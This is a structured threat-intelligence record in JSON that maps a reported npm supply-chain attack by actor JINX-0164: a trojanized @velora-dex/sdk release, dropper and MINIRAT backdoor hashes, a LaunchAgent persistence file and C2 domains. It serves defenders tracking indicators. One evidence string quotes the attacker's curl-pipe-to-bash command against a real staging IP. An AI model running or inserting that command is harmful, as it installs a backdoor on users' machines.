{
  "iim_version": "1.1",
  "chain_id": "wiz.2026.jinx-0164-velora-sdk-minirat-supply-chain",
  "title": "JINX-0164 trojanized @velora-dex/sdk to MINIRAT macOS C2 chain",
  "description": "IIM chain for the Wiz Research report published on 2026-05-27 describing JINX-0164 supply-chain activity. The chain models trojanized npm package @velora-dex/sdk version 4.9.1, a malicious dist/index.js addition that decodes and runs a curl command to 89.36.224.5/troubleshoot/mac/install.sh, dropper delivery, MINIRAT macOS payload execution, and the shared datahub.ink / cloud-sync.online / byte-io.us C2 domain set. It intentionally does not invent npm account credentials, unpublished package download telemetry beyond Wiz/StepSecurity references, or a source-repository compromise because Wiz explicitly says the GitHub source code was not modified.",
  "actor_id": "JINX-0164",
  "observed_at": "2026-05-27T00:00:00Z",
  "confidence": "confirmed",
  "needs_review": false,
  "import_source": "manual-osint-report-to-iim-conversion",
  "entities": [
    {
      "id": "e001",
      "type": "url",
      "value": "https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk on April 7, 2026.",
        "Wiz states Velora is a DEX aggregation protocol and the SDK was an attractive cryptocurrency-industry target.",
        "Wiz states the GitHub source code was not modified, suggesting access was limited to npm credentials."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_package_name": "@velora-dex/sdk",
      "x_package_version": "4.9.1",
      "x_ecosystem": "npm",
      "x_exact_ioc_published": true
    },
    {
      "id": "e002",
      "type": "file",
      "value": "@velora-dex/sdk dist/index.js malicious appended exec block",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states the malicious package appended three lines to dist/index.js.",
        "Wiz publishes the JavaScript exec block that base64-decodes and runs a shell command.",
        "The decoded command downloads install.sh from http://89.36.224.5/troubleshoot/mac/install.sh."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e003",
      "type": "url",
      "value": "http://89.36.224.5/troubleshoot/mac/install.sh",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz publishes the decoded command: nohup bash -c \"$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)\".",
        "Wiz lists two dropper hashes delivered via supply chain from 89.36.224.5.",
        "Wiz states the shell script structure is similar to scripts used to deliver AUDIOFIX but does not display terminal output."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_defanged_value": "http://89.36.224[.]5/troubleshoot/mac/install.sh",
      "x_exact_ioc_published": true
    },
    {
      "id": "e004",
      "type": "ip",
      "value": "89.36.224.5",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz publishes 89.36.224.5 in the decoded @velora-dex/sdk command.",
        "Wiz lists 89.36.224.5 in payload delivery domains for driver-store.com and in supply-chain dropper rows.",
        "Modeled as staging infrastructure for the supply-chain installer URL."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e005",
      "type": "hash",
      "value": "c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
        "This hash is modeled as one of the install.sh/dropper artifacts associated with the supply-chain operation."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "JINX-0164 supply-chain dropper",
      "x_exact_ioc_published": true
    },
    {
      "id": "e006",
      "type": "hash",
      "value": "2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
        "This hash is modeled as another dropper artifact associated with the supply-chain operation."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "JINX-0164 supply-chain dropper",
      "x_exact_ioc_published": true
    },
    {
      "id": "e007",
      "type": "hash",
      "value": "0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT ARM64.",
        "Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
        "Wiz states MINIRAT performs basic reconnaissance, sets persistence, and supports shell command execution, file upload/download, and compression/upload functionality."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "arm64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e008",
      "type": "hash",
      "value": "0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT x86_64.",
        "Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
        "Wiz states MINIRAT uses the same AES key and the same three C&C domains as AUDIOFIX."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "x86_64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e009",
      "type": "hash",
      "value": "a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b",
      "observed_at": "2026-05-08T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT ARM64.",
        "Wiz states a slightly modified MINIRAT version was uploaded to VirusTotal on May 8, 2026, indicating continued use in additional operations."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "arm64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e010",
      "type": "file",
      "value": "~/Library/LaunchAgents/com.apple.Terminal.profiler.plist",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states MINIRAT sets persistence by writing a plist under ~/Library/LaunchAgents/ with the label com.apple.Terminal.profiler.",
        "The plist is modeled as host persistence created by the payload."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e011",
      "type": "domain",
      "value": "datahub.ink",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states MINIRAT uses the same three C&C domains as AUDIOFIX.",
        "Wiz lists datahub.ink as the primary C&C domain and provides two resolved IPs.",
        "Wiz states at publication only the primary domain had been identified resolving."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e012",
      "type": "domain",
      "value": "cloud-sync.online",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists cloud-sync.online as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
        "The IOC table lists no resolved IP for this domain at publication."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e013",
      "type": "domain",
      "value": "byte-io.us",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists byte-io.us as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
        "The IOC table lists no resolved IP for this domain at publication."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e014",
      "type": "ip",
      "value": "208.115.220.17",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists datahub.ink resolving to 208.115.220.17.",
        "This IP is modeled only as a resolved target for the primary C2 domain."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e015",
      "type": "ip",
      "value": "185.175.59.85",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists datahub.ink resolving to 185.175.59.85.",
        "This IP is modeled only as a resolved target for the primary C2 domain."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    }
  ],
  "chain": [
    {
      "entity_id": "e001",
      "role": "entry",
      "techniques": [
        "IIM-T006"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e002",
      "role": "entry",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e003",
      "role": "staging",
      "techniques": [
        "IIM-T002"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e004",
      "role": "staging",
      "techniques": [
        "IIM-T002"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e005",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e006",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e007",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e008",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e009",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e010",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e011",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e012",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e013",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e014",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e015",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    }
  ],
  "relations": [
    {
      "from": "e001",
      "to": "e002",
      "type": "drops",
      "sequence_order": 1,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states version 4.9.1 appended three malicious lines to dist/index.js."
      ]
    },
    {
      "from": "e002",
      "to": "e003",
      "type": "download",
      "sequence_order": 2,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz publishes the decoded curl command to http://89.36.224.5/troubleshoot/mac/install.sh."
      ]
    },
    {
      "from": "e003",
      "to": "e004",
      "type": "resolves-to",
      "sequence_order": 3,
      "confidence": "confirmed",
      "x_evidence": [
        "The installer URL directly uses IP 89.36.224.5 as the host."
      ]
    },
    {
      "from": "e003",
      "to": "e005",
      "type": "references",
      "sequence_order": 4,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists c6ef... as Dropper Delivered via supply chain (89.36.224.5)."
      ]
    },
    {
      "from": "e003",
      "to": "e006",
      "type": "references",
      "sequence_order": 5,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists 2a10... as Dropper Delivered via supply chain (89.36.224.5)."
      ]
    },
    {
      "from": "e005",
      "to": "e007",
      "type": "drops",
      "sequence_order": 6,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states the shell script downloads MINIRAT; exact per-dropper hash-to-MINIRAT hash mapping is not published in a table."
      ]
    },
    {
      "from": "e005",
      "to": "e008",
      "type": "drops",
      "sequence_order": 7,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states MINIRAT supports ARM and x86; exact per-dropper hash-to-payload hash mapping is not published."
      ]
    },
    {
      "from": "e006",
      "to": "e007",
      "type": "drops",
      "sequence_order": 8,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states the supply-chain shell script downloads MINIRAT; exact per-dropper mapping is not published."
      ]
    },
    {
      "from": "e006",
      "to": "e008",
      "type": "drops",
      "sequence_order": 9,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states MINIRAT supports ARM and x86; exact per-dropper mapping is not published."
      ]
    },
    {
      "from": "e007",
      "to": "e010",
      "type": "drops",
      "sequence_order": 10,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
      ]
    },
    {
      "from": "e008",
      "to": "e010",
      "type": "drops",
      "sequence_order": 11,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
      ]
    },
    {
      "from": "e007",
      "to": "e011",
      "type": "connect",
      "sequence_order": 12,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses datahub.ink, cloud-sync.online and byte-io.us as C2 domains."
      ]
    },
    {
      "from": "e007",
      "to": "e012",
      "type": "connect",
      "sequence_order": 13,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
      ]
    },
    {
      "from": "e007",
      "to": "e013",
      "type": "connect",
      "sequence_order": 14,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
      ]
    },
    {
      "from": "e011",
      "to": "e014",
      "type": "resolves-to",
      "sequence_order": 15,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists datahub.ink resolving to 208.115.220.17."
      ]
    },
    {
      "from": "e011",
      "to": "e015",
      "type": "resolves-to",
      "sequence_order": 16,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists datahub.ink resolving to 185.175.59.85."
      ]
    },
    {
      "from": "e009",
      "to": "e011",
      "type": "connect",
      "sequence_order": 17,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states the slightly modified May 8 MINIRAT version uses the same C2 domains."
      ]
    }
  ],
  "attack_annotations": [
    {
      "technique_id": "T1195.002",
      "name": "Supply Chain Compromise: Compromise Software Supply Chain",
      "tactic": "Initial Access",
      "comment": "Trojanized @velora-dex/sdk package version 4.9.1 on npm."
    },
    {
      "technique_id": "T1059.004",
      "name": "Command and Scripting Interpreter: Unix Shell",
      "tactic": "Execution",
      "comment": "Decoded npm payload runs curl-fetched shell script."
    },
    {
      "technique_id": "T1543.001",
      "name": "Create or Modify System Process: Launch Agent",
      "tactic": "Persistence",
      "comment": "MINIRAT LaunchAgent persistence under ~/Library/LaunchAgents."
    }
  ],
  "x_publication_date": "2026-05-27",
  "x_source_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
  "x_source_title": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
  "x_modeling_notes": [
    "Wiz explicitly states the GitHub source code was not modified; the entry is therefore the npm package, not the upstream repository.",
    "Exact npm account compromise details are not published and are not modeled as IoCs.",
    "MINIRAT hash-to-installer mapping is not fully published, so dropper-to-payload relations are marked likely."
  ]
}